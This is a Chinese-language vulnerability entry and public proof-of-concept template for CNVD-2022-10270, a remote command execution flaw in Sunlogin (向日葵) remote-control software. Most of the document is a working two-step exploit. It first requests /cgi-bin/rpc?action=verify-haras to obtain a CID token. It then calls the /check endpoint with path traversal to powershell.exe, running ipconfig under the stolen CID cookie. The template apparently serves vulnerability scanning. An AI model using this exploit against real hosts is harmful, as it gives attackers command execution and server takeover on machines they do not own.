漏洞描述
向日葵通过发送特定的请求获取CID后,可调用 check接口实现远程命令执行,导致服务器权限被获取
body="Verification failure"
CNVD-2022-10270: 向日葵 check 远程命令执行漏洞
PoC代码[已公开]
id: CNVD-2022-10270
info:
name: 向日葵 check 远程命令执行漏洞
author: zan8in
severity: critical
description: |
向日葵通过发送特定的请求获取CID后,可调用 check接口实现远程命令执行,导致服务器权限被获取
body="Verification failure"
reference:
- http://wiki.peiqi.tech/wiki/serverapp/%E5%90%91%E6%97%A5%E8%91%B5/%E5%90%91%E6%97%A5%E8%91%B5%20check%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CNVD-2022-10270.html
rules:
r0:
request:
method: GET
path: /cgi-bin/rpc?action=verify-haras
expression: response.status == 200 && response.body.bcontains(b'"verify_string"')
output:
search: '"\"verify_string\":\"(?P<cid>.+?)\"".bsubmatch(response.body)'
cid: search["cid"]
r1:
request:
method: GET
path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
headers:
Cookie: "CID={{cid}}"
expression: response.status == 200 && response.body.bcontains(b'Windows IP')
expression: r0() && r1()